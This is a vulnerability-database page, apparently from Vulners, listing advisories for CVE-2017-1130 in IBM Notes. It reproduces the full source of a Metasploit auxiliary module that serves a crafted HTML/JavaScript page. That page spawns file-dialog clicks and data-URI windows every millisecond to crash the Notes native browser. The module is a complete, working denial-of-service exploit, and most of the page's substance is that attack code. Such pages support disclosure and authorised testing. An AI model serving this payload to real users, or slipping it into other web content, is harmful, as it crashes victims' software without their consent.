Lucene search
K

IBM Notes Remote Denial of Service Vulnerability(CVE-2017-1130)

🗓️ 07 Nov 2017 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 22 Views

IBM Notes encodeURI DOS vulnerability allows remote attackers to crash the native browser through a crafted webpag

Related
Code
ReporterTitlePublishedViews
Family
0day.today
IBM Notes 8.5.x/9.0.x - Denial of Service (2) Exploit
4 Sep 201700:00
zdt
0day.today
IBM Lotus Notes Denial Of Service Exploit
9 Nov 201700:00
zdt
Circl
CVE-2017-1130
31 Aug 201700:00
circl
CNVD
IBM Notes Denial of Service Vulnerability (CNVD-2017-25669)
6 Sep 201700:00
cnvd
CVE
CVE-2017-1130
5 Sep 201721:00
cve
Cvelist
CVE-2017-1130
5 Sep 201721:00
cvelist
Exploit DB
IBM Notes 8.5.x/9.0.x - Denial of Service (2)
31 Aug 201700:00
exploitdb
exploitpack
IBM Notes 8.5.x9.0.x - Denial of Service (2)
31 Aug 201700:00
exploitpack
Metasploit
IBM Notes Denial Of Service
10 Oct 201706:52
metasploit
NVD
CVE-2017-1130
5 Sep 201721:29
nvd
Rows per page

                                                ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => "IBM Notes encodeURI DOS",
        'Description'    => %q(
          This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.
          If successful, the browser will crash after viewing the webpage.
        ),
        'License'        => MSF_LICENSE,
        'Author'         => [
          'Dhiraj Mishra',
        ],
        'References'     => [
          [ 'EXPLOIT-DB', '42604'],
          [ 'CVE', '2017-1130' ]
        ],
        'DisclosureDate' => 'August 31 2017',
        'Actions'        => [[ 'WebServer' ]],
        'PassiveActions' => [ 'WebServer' ],
        'DefaultAction'  => 'WebServer'
      )
    )
  end

  def run
    exploit # start http server
  end

  def setup
    @html = %|
<html><body>
<input type="file" id="f">
<script>
var w;
var kins = {};
var i = 1;
f.click();
setInterval("f.click()", 1);
setInterval(function(){
	for (var k in kins) {
		if (kins[k] && kins[k].status === undefined) {
			kins[k].close();
			delete kins[k];
		}
	}
	w = open('data:text/html,<input type=file id=f><script>f.click();setInterval("f.click()", 1);<\/script>');
	if (w) {
		kins[i] = w;
		i++;
	}
}, 1);
</script>
</body></html>
    |
  end

  def on_request_uri(cli, _request)
    print_status('Sending response')
    send_response(cli, @html)
  end
end
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation